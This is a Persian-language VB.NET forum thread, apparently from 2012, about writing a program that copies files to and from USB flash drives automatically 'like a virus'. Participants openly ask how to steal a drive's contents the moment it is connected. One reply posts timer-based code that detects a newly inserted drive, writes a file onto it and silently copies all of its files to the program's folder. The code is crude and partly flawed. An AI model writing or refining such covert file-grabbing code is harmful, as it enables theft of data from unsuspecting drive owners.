PDA

View Full Version : چگونه فایلی را بطور خودکار بر روی فلش کپی کنیم (vb)

hosein_2548
شنبه 19 فروردین 1391, 13:34 عصر
سلام دوستان
اگه میشه کمکم کنید تا برنامه ای با ویژوال بیسیک بنویسم که فایلی راروی فلش یا سی دی بطورخودکار کپی کنه
با سپاس
منظور از اتوماتیک اینکه شبیه ویروس باشه،
میبینی ویروس چطور خودکار کپی میشه رو فلش ، منم میخوام این کارا بکنم

armitakarimi
شنبه 19 فروردین 1391, 15:54 عصر
با دستور file copy ، ما منظورت رو از اتوماتیک نفهمیدیم .

tstsst
شنبه 19 فروردین 1391, 16:08 عصر
سلام..
چون فلش اخرین درایوریه که نمایش می ده پس :
Dim s()
s = Environment.GetLogicalDrives
System.IO.File.Copy("sourceFileName As String for exm(c:\test.exe)", s(s.Length - 1) & "test.exe")
اسم درایورها به ترتیب (a,c,d,e,f,g,h,i,...)

aftabeshargh
شنبه 19 فروردین 1391, 21:33 عصر
سلام

منظور از اتوماتیک اینکه شبیه ویروس باشه

فکر کنم منظور دوستمون از مثل ویروس بودن " این بود که 1- برنامه ای بنویسیم که به محض اتصال فلش " اطلاعاتش خودکار رو سیستم کپی بشه 2- و یا برنامه ای باشه تو فلش که به محض اتصال با سیستم خودکار اطلاعات با فرمت های تعیین شده از سیستم به فلش کپی بشه

دوستان برای این دو نظری دارن ؟ از چه دستوراتی برای این دو حالت در vb.net میشه استفاده کرد ؟

Hybrid
شنبه 19 فروردین 1391, 22:58 عصر
سلام

فکر کنم منظور دوستمون از مثل ویروس بودن " این بود که 1- برنامه ای بنویسیم که به محض اتصال فلش " اطلاعاتش خودکار رو سیستم کپی بشه 2- و یا برنامه ای باشه تو فلش که به محض اتصال با سیستم خودکار اطلاعات با فرمت های تعیین شده از سیستم به فلش کپی بشه

دوستان برای این دو نظری دارن ؟ از چه دستوراتی برای این دو حالت در vb.net میشه استفاده کرد ؟

اصلا کاری نداره ، به نظر من سخترین ( که ساده ترین هم هست) میشه شناسایی Flash Disk و بعد از اون میتونین از طریق متد Getfiles و FileCopy راحت فایل ها رو به مسیر دلخواه انتقال بدین .

aftabeshargh
شنبه 19 فروردین 1391, 23:03 عصر
سلام
چطور باید به محض اتصال فلش برنامه فعال بشه و از داخل فلش سرقت کنه؟

Hybrid
یک شنبه 20 فروردین 1391, 00:01 صبح
سلام
چطور باید به محض اتصال فلش برنامه فعال بشه و از داخل فلش سرقت کنه؟

اینم جای کار داره ، چند تا ایده داخل ذهنم هست اگه پیادش کنم حتما شما رو هم در جریان میزارم.این نمونه برنامه ی کوچیکی هست که نوشتم ، لیست کول دسک ها رو میاره و اطلاعات داخلش یک کول دیسک رو لیست میکنه ، بعدا اگه وقت کردم حتما کاملش میکنم ، شما هم اگه زودتر کامل کردین واسه دوستان قرار بدین.

hosein_2548
یک شنبه 20 فروردین 1391, 02:03 صبح
شرمنده که من نت.نستم منظورم و درست بیان کنم
به محض اینکه فلش وارد سیستم شد
یک فایل از روی هارد بر روی فلش کپی بشه
البته اگه از روی فلش بر روی هارد هم باشه ممنونو میشم

tstsst
یک شنبه 20 فروردین 1391, 14:20 عصر
سلام
یک ایده دارم برنامه که اجرا می شه لیست تمام درایو ها رو ذخیره می کنه و بعد بعد یک تایمر دارید که چک می کنه اگه به اون لیست یک درایو اضافه شد فایل مورد نظر رو کپی می کنه و خود فلش رو هم اطلاعاتش رو می گیره :

به این صورت که :
اینا رو تو کلاس می نویسیم
Private list()
Private nl As Integer
و اینا مال فرم لود :

Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
list = Environment.GetLogicalDrives
nl = Environment.GetLogicalDrives.Length
Timer1.Start()
End Sub
اینا هم مال تایمر :
Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
If nl < list.Length Then
System.IO.File.Copy(Application.StartupPath & "\test.txt", list(list.Length - 1) & "test.txt", True)
Dim Flist()
Flist = System.IO.Directory.GetFiles(list(list.Length - 1))
For i = 0 To Flist.Length - 1
System.IO.File.Copy(Flist(i), Application.StartupPath & "\" & Mid(Flist(i), 3), True)
Next
End If
list = Environment.GetLogicalDrives
End Sub

و در کل تو ضمیمه :

hosein_2548
یک شنبه 20 فروردین 1391, 22:40 عصر
خیلی ممنون
امید وارم بدردم بخوره
جبران میکنم

hosein_2548
سه شنبه 22 فروردین 1391, 17:45 عصر